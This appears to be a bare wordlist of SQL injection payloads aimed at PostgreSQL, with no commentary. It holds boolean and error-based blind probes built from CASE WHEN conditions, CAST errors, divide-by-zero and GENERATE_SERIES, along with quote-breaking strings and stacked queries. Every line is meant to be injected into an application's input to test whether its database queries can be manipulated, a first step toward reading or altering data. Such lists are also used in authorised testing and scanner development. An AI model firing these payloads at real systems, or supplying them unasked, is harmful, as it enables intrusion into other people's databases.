AND (SELECT (CASE WHEN (1234=1234) THEN NULL ELSE CAST('abracadabra' AS NUMERIC) END)) IS NULL
OR (SELECT (CASE WHEN (1234=1234) THEN NULL ELSE CAST('abracadabra' AS NUMERIC) END)) IS NULL
(SELECT (CASE WHEN (1234=1234) THEN 1234 ELSE 1/(SELECT 0) END))
(SELECT (CASE WHEN (1234=1234) THEN 1235 ELSE 1/(SELECT 0) END))
' and 1234=1234 and 'abracadabra'='abracadabra
(SELECT * FROM GENERATE_SERIES(1234,1234,CASE WHEN (1234=1234) THEN 1 ELSE 0 END) LIMIT 1)
(SELECT 1235 FROM GENERATE_SERIES(1234,1234,CASE WHEN (1234=1234) THEN 1 ELSE 0 END) LIMIT 1)
,(SELECT (CASE WHEN (1234=1234) THEN 1 ELSE 1/(SELECT 0) END))
,(SELECT (CASE WHEN (1234=1234) THEN 1235 ELSE 1/(SELECT 0) END))
;SELECT (CASE WHEN (1234=1234) THEN 1234 ELSE 1/(SELECT 0) END)
;SELECT * FROM GENERATE_SERIES(1234,1234,CASE WHEN (1234=1234) THEN 1 ELSE 0 END) LIMIT 1